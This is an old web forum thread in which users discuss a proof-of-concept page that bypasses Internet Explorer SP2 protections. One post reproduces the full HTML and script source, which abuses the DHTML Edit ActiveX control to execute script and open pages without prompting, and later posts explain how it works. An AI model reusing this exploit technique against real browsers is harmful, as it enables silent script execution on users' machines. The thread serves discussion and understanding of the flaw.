Jump to content
xisto Community
Sign in to follow this  
r3d1405241470

Ie Sp2 Protection, Defeated! another one kick ms

Recommended Posts

I haven't gone to the link, but by the looks of it, it kind of seems as if a virus is going to infect us or something if we go there. I have already rebooted my XP's drivers too may times for me to go to a site where I am just asking for a virus.

Share this post


Link to post
Share on other sites

well this is the source, I will bold the bad stuff.

 

<body onload="setTimeout(' main() ',1000)">

<object

id="x"

classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"

width="1"

height="1"

align="middle"

>

<PARAM NAME="ActivateApplets" VALUE="1">

<PARAM NAME="ActivateActiveXControls" VALUE="1">

</object>

 

<script>

// 10.11.04 http://www.editive.com/

 

function shellscript()

{

open("http://forums.xisto.com/no_longer_exists/;);

showModalDialog("http://forums.xisto.com/no_longer_exists/;);

}

 

function main()

{

x.DOM.Script.execScript(shellscript.toString());

x.DOM.Script.setTimeout("shellscript()");

}

</SCRIPT>

<br><br><br><br><br><br><center><img src=nocigar.gif><br><br><FONT FACE=ARIAL SIZE 12PT>NO CIGAR !</FONT></center>

 

That Is why I use FireFOX

Share this post


Link to post
Share on other sites

Whats meant to happen if you run it with IE... ?on my Linux system it just says "No cigar" and applauds me.. i take it i passed ^_^is this a bug that wasnt fixed by SP2, and will also affect Sp1... or was it a bug introduced by SP2 ?

Share this post


Link to post
Share on other sites

looking through that script, it seems that it sets a timeout that opens the URL http://forums.xisto.com/no_longer_exists/ every 1000ms (1 second). i haven't actually tested it in IE since i use Opera.

AND if you want to know, activex class id '2D360201-FFF5-11d1-8D03-00A0C959BC0A' (the object used in the script) is the DHTML Edit Control. Microsoft has marked this 'safe for scripting', meaning that internet explorer will run the activex control without even asking you... regardless of the security settings (i think).

Share this post


Link to post
Share on other sites

Is it just me or is this all to easy to do? Dammit by just using a right class id you can run scripts even if the user has opted not to do so. Did I misunderstand something or are things this bad with MS?

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.